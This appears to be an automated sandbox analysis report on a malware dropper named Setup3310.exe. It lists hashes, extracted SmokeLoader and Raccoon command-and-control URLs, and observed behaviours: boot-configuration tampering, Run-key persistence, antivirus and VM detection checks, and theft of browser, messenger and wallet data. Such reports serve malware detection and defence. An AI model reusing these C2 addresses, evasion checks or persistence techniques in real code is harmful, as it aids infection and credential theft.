Resubmissions
18-03-2021 16:36
210318-gp18cmknhn 1018-03-2021 16:36
210318-c2gfjesvja 1018-03-2021 16:36
210318-vqkv89gzv2 1018-03-2021 16:36
210318-hkbpmljzte 1018-03-2021 16:36
210318-x2ph225zjs 1018-03-2021 16:04
210318-a66favrxcs 10Analysis
-
max time kernel
144s -
max time network
1800s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
18-03-2021 16:04
Static task
static1
Behavioral task
behavioral1
Sample
Setup3310.exe
Resource
win10v20201028
General
-
Target
Setup3310.exe
-
Size
381KB
-
MD5
acf61459d6319724ab22cb5a8308d429
-
SHA1
8a5d782e6f31c3005e5e0706a3d266ece492a6cf
-
SHA256
344d7b46385722db4733eee860283c00327c85f28dd76acc996be63f4c4c956e
-
SHA512
d5f38cb8ed500510ba7d466345c854856ec70121683d4b5398651bfd41a7f5f8d754e8fece0bca38e334214d326afa1970b19e79c3d8507bff9d7782df762877
Malware Config
Extracted
http://labsclub.com/welcome
Extracted
smokeloader
2019
http://10022020newfolder1002002131-service1002.space/
http://10022020newfolder1002002231-service1002.space/
http://10022020newfolder3100231-service1002.space/
http://10022020newfolder1002002431-service1002.space/
http://10022020newfolder1002002531-service1002.space/
http://10022020newfolder33417-01242510022020.space/
http://10022020test125831-service1002012510022020.space/
http://10022020test136831-service1002012510022020.space/
http://10022020test147831-service1002012510022020.space/
http://10022020test146831-service1002012510022020.space/
http://10022020test134831-service1002012510022020.space/
http://10022020est213531-service100201242510022020.ru/
http://10022020yes1t3481-service1002012510022020.ru/
http://10022020test13561-service1002012510022020.su/
http://10022020test14781-service1002012510022020.info/
http://10022020test13461-service1002012510022020.net/
http://10022020test15671-service1002012510022020.tech/
http://10022020test12671-service1002012510022020.online/
http://10022020utest1341-service1002012510022020.ru/
http://10022020uest71-service100201dom2510022020.ru/
http://10022020test61-service1002012510022020.website/
http://10022020test51-service1002012510022020.xyz/
http://10022020test41-service100201pro2510022020.ru/
http://10022020yest31-service100201rus2510022020.ru/
http://10022020rest21-service1002012510022020.eu/
http://10022020test11-service1002012510022020.press/
http://10022020newfolder4561-service1002012510022020.ru/
http://10022020rustest213-service1002012510022020.ru/
http://10022020test281-service1002012510022020.ru/
http://10022020test261-service1002012510022020.space/
http://10022020yomtest251-service1002012510022020.ru/
http://10022020yirtest231-service1002012510022020.ru/
Extracted
metasploit
windows/single_exec
Extracted
raccoon
afefd33a49c7cbd55d417545269920f24c85aa37
-
url4cnc
https://telete.in/jagressor_kz
Signatures
-
Glupteba Payload 4 IoCs
Processes:
resource yara_rule behavioral1/memory/7564-460-0x0000000000400000-0x0000000000C77000-memory.dmp family_glupteba behavioral1/memory/7564-463-0x0000000004FF0000-0x000000000584D000-memory.dmp family_glupteba behavioral1/memory/7564-467-0x0000000000400000-0x0000000000C77000-memory.dmp family_glupteba behavioral1/memory/10940-508-0x0000000000400000-0x0000000000C77000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
Processes:
WerFault.exedescription pid process target process PID 5276 created 1788 5276 WerFault.exe 1mirsv0ngwj.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
svchost.exedescription pid process target process PID 12404 created 8748 12404 svchost.exe app.exe -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Modifies boot configuration data using bcdedit 15 IoCs
Processes:
bcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exepid process 5796 bcdedit.exe 17824 bcdedit.exe 5956 bcdedit.exe 6684 bcdedit.exe 5804 bcdedit.exe 6748 bcdedit.exe 6124 bcdedit.exe 6956 bcdedit.exe 5236 bcdedit.exe 7556 bcdedit.exe 5440 bcdedit.exe 9296 bcdedit.exe 16288 bcdedit.exe 5140 bcdedit.exe 10572 bcdedit.exe -
Drops file in Drivers directory 5 IoCs
Processes:
HGT.exereg.exeDkMquET.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts HGT.exe File opened for modification C:\Windows\system32\drivers\etc\hosts reg.exe File opened for modification C:\Windows\System32\drivers\SETFF9E.tmp DkMquET.exe File created C:\Windows\System32\drivers\SETFF9E.tmp DkMquET.exe File opened for modification C:\Windows\System32\drivers\tap0901.sys DkMquET.exe -
Executes dropped EXE 64 IoCs
Processes:
Setup3310.tmpSetup.exeSetup.tmpDelta.exeDelta.tmpSetup.exePictureLAb.exePictureLAb.tmpSetup.exeSetup.tmpHGT.exeprolab.exeZHivecanaepae.exeprolab.tmpgaooo.exejfiag3g_gg.exemd7_7dfj.exejfiag3g_gg.exeaskinstall29.execustomer4.exemain.exeHookSetp.exeprivacytools5.exe5302290.584017391.44Windows Host.exeprivacytools5.exesetup.exeMultitimerFour.exesetup.exemultitimer.exesetups.exesetups.tmphjjgaa.exejfiag3g_gg.exemultitimer.exemultitimer.exeparse.exeparse.exeparse.exe7za.exejfiag3g_gg.exev2jb4qjnxkb.exe1mirsv0ngwj.exeSetup3310.exeSetup3310.tmpv2jb4qjnxkb.tmpAwesomePoolU1.exevict.exeaskinstall24.exevpn.exevict.tmpvpn.tmpIBInstaller_97039.exeapp.exeIBInstaller_97039.tmpwinlthst.exechrome_proxy.exewimapi.exeSetup.exeSetup.tmpschtasks.exesetup.exegahkkRosw.exepid process 1568 Setup3310.tmp 1816 Setup.exe 1452 Setup.tmp 1940 Delta.exe 564 Delta.tmp 3508 Setup.exe 2736 PictureLAb.exe 3828 PictureLAb.tmp 916 Setup.exe 3292 Setup.tmp 3484 HGT.exe 2192 prolab.exe 2128 ZHivecanaepae.exe 3304 prolab.tmp 12860 gaooo.exe 14204 jfiag3g_gg.exe 4488 md7_7dfj.exe 5404 jfiag3g_gg.exe 6116 askinstall29.exe 14640 customer4.exe 14868 main.exe 15372 HookSetp.exe 15748 privacytools5.exe 15892 5302290.58 15928 4017391.44 16164 Windows Host.exe 16236 privacytools5.exe 16448 setup.exe 16600 MultitimerFour.exe 16916 setup.exe 16948 multitimer.exe 16844 setups.exe 17020 setups.tmp 17608 hjjgaa.exe 17772 jfiag3g_gg.exe 17896 multitimer.exe 18028 multitimer.exe 18284 parse.exe 18296 parse.exe 18324 parse.exe 4168 7za.exe 3212 jfiag3g_gg.exe 1684 v2jb4qjnxkb.exe 1788 1mirsv0ngwj.exe 4368 Setup3310.exe 4268 Setup3310.tmp 4276 v2jb4qjnxkb.tmp 4328 AwesomePoolU1.exe 4384 vict.exe 4344 askinstall24.exe 4464 vpn.exe 4616 vict.tmp 4648 vpn.tmp 4660 IBInstaller_97039.exe 4752 app.exe 4768 IBInstaller_97039.tmp 4960 winlthst.exe 5144 chrome_proxy.exe 5168 wimapi.exe 6056 Setup.exe 6216 Setup.tmp 6884 schtasks.exe 7188 setup.exe 7312 gahkkRosw.exe -
Looks for VMWare Tools registry key 2 TTPs
-
Modifies Windows Firewall 1 TTPs
-
Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
-
Sets service image path in registry 2 TTPs
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx behavioral1/memory/13468-1276-0x0000000000400000-0x0000000000897000-memory.dmp upx -
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
setup.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion setup.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
setups.tmpcmd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation setups.tmp Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation cmd.exe -
Loads dropped DLL 50 IoCs
Processes:
Setup3310.tmpSetup.tmpDelta.tmpPictureLAb.tmpSetup.tmpSetup.exemain.exeprivacytools5.exesetups.tmpsetup.exev2jb4qjnxkb.tmpSetup3310.tmpvict.tmpvpn.tmpIBInstaller_97039.tmpSetup.tmpapp.exeDelta.tmpPictureLAb.tmpSetup.tmpSetup.exemask_svc.exemain.exeprivacytools5.exepid process 1568 Setup3310.tmp 1568 Setup3310.tmp 1452 Setup.tmp 1452 Setup.tmp 564 Delta.tmp 564 Delta.tmp 3828 PictureLAb.tmp 3828 PictureLAb.tmp 3292 Setup.tmp 3508 Setup.exe 3508 Setup.exe 14868 main.exe 16236 privacytools5.exe 17020 setups.tmp 17020 setups.tmp 17020 setups.tmp 17020 setups.tmp 17020 setups.tmp 16448 setup.exe 4276 v2jb4qjnxkb.tmp 4268 Setup3310.tmp 4268 Setup3310.tmp 4616 vict.tmp 4648 vpn.tmp 4648 vpn.tmp 4648 vpn.tmp 4648 vpn.tmp 4648 vpn.tmp 4648 vpn.tmp 4648 vpn.tmp 4648 vpn.tmp 4768 IBInstaller_97039.tmp 6216 Setup.tmp 6216 Setup.tmp 4752 app.exe 8548 Delta.tmp 8548 Delta.tmp 8852 PictureLAb.tmp 8852 PictureLAb.tmp 9140 Setup.tmp 8796 Setup.exe 8796 Setup.exe 10016 mask_svc.exe 10016 mask_svc.exe 9308 main.exe 10016 mask_svc.exe 10016 mask_svc.exe 10016 mask_svc.exe 10016 mask_svc.exe 11576 privacytools5.exe -
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 5 IoCs
Processes:
HGT.exegaooo.exe4017391.44hjjgaa.exemultitimer.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Multimedia Platform\\Raedyshoqate.exe\"" HGT.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe" gaooo.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Host = "C:\\ProgramData\\Windows Host\\Windows Host.exe" 4017391.44 Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe" hjjgaa.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\knmeo5weatk = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\B4AFZH03CW\\multitimer.exe\" 1 3.1616083582.60537a7e59a7f" multitimer.exe -
Checks for any installed AV software in registry 1 TTPs 53 IoCs
Processes:
multitimer.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McProxy multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\K7 Computing\K7TotalSecurity multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\McAfee\DesktopProtection multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet\Services\MBAMProtector multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\TrendMicro\UniClient multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVG\AV multitimer.exe Key opened \REGISTRY\MACHINE\Software\Avira\Antivirus multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\COMODO\CIS multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\KasperskyLab multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\BavSvc multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DrWebAVService multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVG\AV multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\G Data\AntiVirenKit multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Fortinet\FortiClient\installed multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\COMODO\CIS multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\a2AntiMalware multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ESET\NOD multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Avira\Antivirus multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\ArcaBit multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Sophos multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\FRISK Software\F-PROT Antivirus for Windows multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Vba32\Loader multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ClamWin\Version multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McAPExe multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\IKARUS\anti.virus multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ESET\NOD multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AVP18.0.0 multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\COMODO\CIS multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\BullGuard Ltd.\BullGuard\Main multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\ClamWin\Version multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AntiVirService multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVG\AV multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Bitdefender\QuickScan multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Jiangmin\ComputerID multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\ESET\NOD multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\avast! Antivirus multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ClamWin\Version multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
md7_7dfj.exe4662584.51description ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md7_7dfj.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 4662584.51 -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 64 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 4379 ipinfo.io 2676 ipinfo.io 3372 ip-api.com 4274 ip-api.com 2856 ipinfo.io 3346 ipinfo.io 3047 ipinfo.io 3102 checkip.amazonaws.com 3642 checkip.amazonaws.com 1710 ipinfo.io 2851 ipinfo.io 1364 ipinfo.io 4197 ipinfo.io 1353 ipinfo.io 1898 ipinfo.io 3576 ipinfo.io 4505 checkip.amazonaws.com 960 ip-api.com 1120 ipinfo.io 922 ipinfo.io 1234 checkip.amazonaws.com 4116 ip-api.com 4473 ip-api.com 2674 ipinfo.io 3141 ipinfo.io 4050 ipinfo.io 4127 ipinfo.io 7 ipinfo.io 656 ipinfo.io 746 ip-api.com 4335 ipinfo.io 1074 ipinfo.io 2144 ipinfo.io 2926 ip-api.com 3865 ipinfo.io 3989 ipinfo.io 4062 checkip.amazonaws.com 874 ipinfo.io 1028 checkip.amazonaws.com 267 api.ipify.org 1642 ipinfo.io 2786 ipinfo.io 4115 ipinfo.io 4377 ipinfo.io 9 ipinfo.io 56 ipinfo.io 2118 checkip.amazonaws.com 3787 ipinfo.io 2750 ipinfo.io 303 ipinfo.io 2244 ipinfo.io 1954 ipinfo.io 3252 ipinfo.io 510 checkip.amazonaws.com 572 ipinfo.io 1761 ip-api.com 2231 ipinfo.io 2833 ip-api.com 3546 ipinfo.io 3825 ipinfo.io 4082 ipinfo.io 176 checkip.amazonaws.com 207 ipinfo.io 2865 ipinfo.io -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
Processes:
multitimer.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum multitimer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 multitimer.exe -
Drops file in System32 directory 18 IoCs
Processes:
DrvInst.exeDkMquET.exetapinstall.exesetup.exedescription ioc process File opened for modification C:\Windows\System32\DriverStore\Temp\{314b7e35-699f-684e-9115-f564dc5fed66}\SETFDD9.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{314b7e35-699f-684e-9115-f564dc5fed66}\tap0901.cat DrvInst.exe File created C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF DkMquET.exe File created C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF tapinstall.exe File created C:\Windows\system32\GroupPolicy\gpt.ini setup.exe File created C:\Windows\System32\DriverStore\Temp\{314b7e35-699f-684e-9115-f564dc5fed66}\SETFDD9.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{314b7e35-699f-684e-9115-f564dc5fed66}\oemvista.inf DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{314b7e35-699f-684e-9115-f564dc5fed66}\SETFDEB.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{314b7e35-699f-684e-9115-f564dc5fed66}\tap0901.sys DrvInst.exe File opened for modification C:\Windows\System32\CatRoot2\dberr.txt DrvInst.exe File created C:\Windows\System32\DriverStore\Temp\{314b7e35-699f-684e-9115-f564dc5fed66}\SETFDEB.tmp DrvInst.exe File created C:\Windows\System32\DriverStore\drvstore.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.cat DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{314b7e35-699f-684e-9115-f564dc5fed66}\SETFDEA.tmp DrvInst.exe File created C:\Windows\System32\DriverStore\Temp\{314b7e35-699f-684e-9115-f564dc5fed66}\SETFDEA.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.sys DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.inf DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{314b7e35-699f-684e-9115-f564dc5fed66} DrvInst.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs
Processes:
parse.exeparse.exeparse.exemask_svc.exemask_svc.exemask_svc.exepid process 18284 parse.exe 18324 parse.exe 18296 parse.exe 18284 parse.exe 18296 parse.exe 18324 parse.exe 18284 parse.exe 18296 parse.exe 18324 parse.exe 18284 parse.exe 7928 mask_svc.exe 9200 mask_svc.exe 10016 mask_svc.exe -
Suspicious use of SetThreadContext 4 IoCs
Processes:
privacytools5.exegahkkRosw.exe01l7JAVSi.exeprivacytools5.exedescription pid process target process PID 15748 set thread context of 16236 15748 privacytools5.exe privacytools5.exe PID 7312 set thread context of 7576 7312 gahkkRosw.exe gahkkRosw.exe PID 7416 set thread context of 5056 7416 01l7JAVSi.exe 01l7JAVSi.exe PID 11100 set thread context of 11576 11100 privacytools5.exe privacytools5.exe -
Drops file in Program Files directory 64 IoCs
Processes:
vpn.tmpprolab.tmpIBInstaller_97039.tmpapp.exe7za.exeHGT.exe7za.exev2jb4qjnxkb.tmpvict.tmp7za.exesetup.exedescription ioc process File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-CLRGH.tmp vpn.tmp File created C:\Program Files (x86)\Picture Lab\is-2BM89.tmp prolab.tmp File opened for modification C:\Program Files (x86)\IBBrowserInstallerEngine\ServiceModelInstallRC.dll IBInstaller_97039.tmp File created C:\Program Files (x86)\MaskVPN\is-FI9V3.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-93US0.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-54076.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-Q9218.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-1EVFU.tmp vpn.tmp File created C:\Program Files (x86)\Twilight-Cloud\7za.exe app.exe File opened for modification C:\Program Files (x86)\MaskVPN\tunnle.exe vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\MaskVPN.exe vpn.tmp File created C:\Program Files (x86)\Twilight-Cloud\winamp-plugins.7z app.exe File created C:\Program Files (x86)\Picture Lab\is-0C52G.tmp prolab.tmp File opened for modification C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Delphi.dll IBInstaller_97039.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-CGI5D.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-0GEA5.tmp vpn.tmp File opened for modification C:\Program Files (x86)\Twilight-Cloud\WinmonProcessMonitor.sys 7za.exe File created C:\Program Files\Windows Portable Devices\NXMJWTVHDM\prolab.exe.config HGT.exe File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-VMBSC.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\unins000.msg vpn.tmp File created C:\Program Files (x86)\Still-Dream\WinmonProcessMonitor.sys 7za.exe File created C:\Program Files (x86)\Twilight-Cloud\7za.dll app.exe File created C:\Program Files (x86)\Picture Lab\is-AB54U.tmp prolab.tmp File created C:\Program Files (x86)\Picture Lab\is-5D16Q.tmp prolab.tmp File created C:\Program Files (x86)\viewerise\is-FSMB2.tmp v2jb4qjnxkb.tmp File created C:\Program Files (x86)\MaskVPN\is-ELVO4.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-8N8LI.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-RPURB.tmp vpn.tmp File opened for modification C:\Program Files (x86)\Picture Lab\WeifenLuo.WinFormsUI.dll prolab.tmp File opened for modification C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Studio.Delphi.dll IBInstaller_97039.tmp File created C:\Program Files (x86)\IBBrowserInstallerEngine\is-K9PHT.tmp IBInstaller_97039.tmp File opened for modification C:\Program Files (x86)\viewerise\unins000.dat vict.tmp File created C:\Program Files (x86)\MaskVPN\is-L3T1C.tmp vpn.tmp File opened for modification C:\Program Files (x86)\Twilight-Cloud\winamp.exe 7za.exe File created C:\Program Files\Windows Portable Devices\NXMJWTVHDM\prolab.exe HGT.exe File created C:\Program Files (x86)\Windows Multimedia Platform\Raedyshoqate.exe HGT.exe File created C:\Program Files (x86)\Still-Dream\7za.dll setup.exe File opened for modification C:\Program Files (x86)\MaskVPN\tunnle.dll vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-S277A.tmp vpn.tmp File opened for modification C:\Program Files (x86)\Still-Dream\setup.exe setup.exe File created C:\Program Files (x86)\Picture Lab\is-51UB0.tmp prolab.tmp File created C:\Program Files (x86)\Still-Dream\7zxa.dll setup.exe File created C:\Program Files (x86)\IBBrowserInstallerEngine\is-TV0MA.tmp IBInstaller_97039.tmp File created C:\Program Files (x86)\Twilight-Cloud\winamp.exe 7za.exe File created C:\Program Files (x86)\Twilight-Cloud\winamp.exe 7za.exe File opened for modification C:\Program Files (x86)\Picture Lab\DockingToolbar.dll prolab.tmp File created C:\Program Files (x86)\Picture Lab\is-E1NHI.tmp prolab.tmp File created C:\Program Files (x86)\viewerise\unins000.dat v2jb4qjnxkb.tmp File opened for modification C:\Program Files (x86)\MaskVPN\mask_svc.exe vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-G7HRS.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-PL48L.tmp vpn.tmp File opened for modification C:\Program Files (x86)\Still-Dream\help.txt setup.exe File created C:\Program Files (x86)\IBBrowserInstallerEngine\is-UNHQU.tmp IBInstaller_97039.tmp File created C:\Program Files (x86)\MaskVPN\is-UH53P.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-ARMJR.tmp vpn.tmp File created C:\Program Files (x86)\Twilight-Cloud\7zxa.dll app.exe File opened for modification C:\Program Files (x86)\Twilight-Cloud\winamp.7z app.exe File created C:\Program Files (x86)\Picture Lab\is-KK1AR.tmp prolab.tmp File created C:\Program Files (x86)\MaskVPN\unins000.dat vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-07LCU.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-GK1J3.tmp vpn.tmp File created C:\Program Files (x86)\Still-Dream\winamp.exe 7za.exe File created C:\Program Files (x86)\Windows Multimedia Platform\Raedyshoqate.exe.config HGT.exe File opened for modification C:\Program Files (x86)\MaskVPN\driver\winxp32\devcon.exe vpn.tmp -
Drops file in Windows directory 13 IoCs
Processes:
svchost.exeDkMquET.exeMicrosoftEdge.exeschtasks.exetapinstall.exeDrvInst.exemultitimer.exeWerFault.exeMicrosoftEdge.exedescription ioc process File opened for modification C:\Windows\INF\setupapi.dev.log svchost.exe File opened for modification C:\Windows\INF\setupapi.dev.log DkMquET.exe File created C:\Windows\INF\oem2.PNF DkMquET.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\Tasks\bWIRRaDZCpCYZHZEtf.job schtasks.exe File opened for modification C:\Windows\INF\setupapi.dev.log tapinstall.exe File opened for modification C:\Windows\inf\oem2.inf DrvInst.exe File created C:\Windows\inf\oem2.inf DrvInst.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new multitimer.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new multitimer.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
